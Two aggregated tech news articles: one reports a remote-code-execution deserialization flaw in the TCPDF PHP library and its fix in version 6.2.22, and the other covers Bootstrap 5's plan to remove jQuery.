Severe security bug found in popular PHP library for creating PDF files

A security researcher has found a severe security flaw in one of the internet’s most popular PHP libraries for creating PDF files.

The vulnerability impacts TCPDF, one of the “big three” PHP libraries –together with mPDF and FPDF– for converting HTML code to PDF docs or assembling PDF files on the fly.

The security flaw can be exploited by an attacker to achieve “remote code execution” on websites and web apps that use the TCPDF library, allowing a threat actor to run malicious code and potentially take over these systems.

The vulnerability, per-se, is actually a variation of another researcher’s discovery.

The initial flaw was found by Secarma researcher Sam Thomas who in a series of experiments showcased a new deserialization bug affecting PHP apps over the summer of 2018. He released a research paper detailing PHP serialization attacks against the WordPress and Typo3 CMS platforms, but also the TCPDF library embedded inside the Contao CMS.


In a blog post published over the weekend, an Italian security researcher who goes online as Polict revealed a new PHP serialization flaw impacting TCPDF in the same way as the one discovered by Thomas last year.

Polict says the vulnerability he found can be exploited in two ways. The first case is on websites that allow user input to be part of the PDF file generation process, such as when adding names or other details inside invoices.

The second is on websites that contain cross-site scripting (XSS) vulnerabilities where an attacker can plant malicious code inside the HTML source code that will be fed to the TCPDF library to convert into a PDF.

The trick is to supply malformed data to the TCPDF library. This data is modified in such a way to force the TCPDF library to call the PHP server’s “phar://” stream wrapper, and later abuse the PHP deserialization process to run code on the underlying server.

It’s a very complex attack routine, and it requires advanced PHP coding knowledge to exploit. Deserialization exploits, in general, are hard to uncover and they’re the bane of many programming languages, including Ruby, Java, and .NET –besides PHP.

FLAW FIXED IN V6.2.20… ERM… V6.2.22

The researcher says he reported the vulnerability (CVE-2018-17057) to the TCPDF library author last August. The TCPDF team released TCPDF 6.2.20 in September to address the issue.

However, users should update to at least version 6.2.22 because the TCPDF team accidentally re-introduced the vulnerability reported by Sam Thomas while attempting to patch the one reported by Polict. Both issues were deemed resolved in version 6.2.22.

The Italian security researcher published details about this vulnerability only today, six months after the patch, because of the bug’s severity and to allow website and web app owners enough time to patch.

The TCPDF library is one of today’s most popular PHP libraries and has been used all over the place –in standalone websites, in content management systems (CMSs), CMS plugins, CMS themes, enterprise intranets, CRMs, HRMs, invoicing solutions, many PDF-centered web apps, and others.

Patching isn’t as easy as it sounds. In some cases, this might mean replacing a file and editing a build instruction, but in other places, this might require rewriting large swaths of code.

[Lifted from:]

Bootstrap 5 will replace jQuery entirely

The Bootstrap team is nearing its mission to completely remove jQuery from its framework in favor of JavaScript. Bootstrap is an open-source framework for responsive mobile solutions on the web.

The team recently released version 4.3 of the framework with its plans to remove jQuery. “The cat is out of the bag—we’re dropping our largest client-side dependency for regular JavaScript,” the team wrote in a blog post. “We’ve been working on this for a long time and have a pull request in progress and near completion.”

According to the pull request, this has been in the works since 2017. Once Bootstrap is released without jQuery, developers will still be able to use the framework plugin if jQuery is detected, the team explained.

The move to remove jQuery has spurred a lot of controversy in the development community.

“This entire effort seems of dubious benefit to me,” one developer commented. “Whereas before it was ‘jQuery for EVERYTHING,’ now it seems to be the reverse: ‘remove jQuery from EVERYTHING,’ which is equally silly. jQuery does a lot of useful stuff, and all things considered remains a pretty neat project. It shouldn’t be used for everything, but spending loads of time in removing it just because it’s no longer the [cool framework] of the week just seems like a waste of effort.”

While others feel like jQuery was good for a lot of useful stuff, now it is unmaintained and has little interest or support.

“It is ‘slow’ compared to other frameworks that now use the Shadow Dom, and can be replaced with features that are native to JS — what’s there not to like about that?” another developer commented. “One less dependency, network request and more efficient code is always worth the effort.”

Other upcoming projects include improving the Bootstrap branches for development and moving to Hugo.